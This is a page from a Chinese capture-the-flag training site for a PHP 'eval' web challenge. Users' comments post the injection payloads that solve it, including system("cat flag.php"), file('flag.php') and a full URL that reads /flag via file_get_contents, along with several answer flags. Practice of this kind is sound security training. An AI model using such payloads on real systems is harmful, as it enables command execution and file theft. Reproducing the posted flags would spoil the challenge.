evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 16934
提  示:
描  述:
eval
评论
wangyihao 1年前

hello=system("cat flag.php")

回复 0

18092952956 1年前

show_source('flag.php')

回复 0

BlueL1ght 1年前

system("cat+flag.php")

回复 0

zhuleixy 1年前

我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//

回复 3

15738762315 1年前

flag{6dd6075616f5943ab53cff237ff1a63b}

回复 0

maoctf 1年前

flag{b97285ef92aa650fa9223aafc7adc646};

回复 0

哥哥 1年前

http://114.67.175.224:12290//?hello=file('flag.php')

回复 0

z03ctfer 1年前

?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中

回复 0

马踏黄河两岸 1年前

../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php

回复 0

lilifanqian 1年前

flag{4cadd25b49840f0cdb999cdabc86b103}

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

testda 攻破了该题 1小时前
satuo 攻破了该题 1小时前
goeasy 攻破了该题 5小时前
867736371 攻破了该题 5小时前
废柴小白 攻破了该题 5小时前
19893123836 攻破了该题 6小时前
tcg979 攻破了该题 18小时前
AX渊仪 攻破了该题 23小时前
qwerfsafafa 攻破了该题 23小时前
太水了410410 攻破了该题 23小时前
6145 攻破了该题 1天前
zer0_h 攻破了该题 1天前
Hehe0619 攻破了该题 1天前
李嘉欣a 攻破了该题 1天前
嗨客111 攻破了该题 1天前
呆羊 攻破了该题 1天前
ahco 攻破了该题 1天前
17365797718 攻破了该题 1天前
你猜呀啊哈哈 攻破了该题 1天前
123456rue 攻破了该题 1天前
问题反馈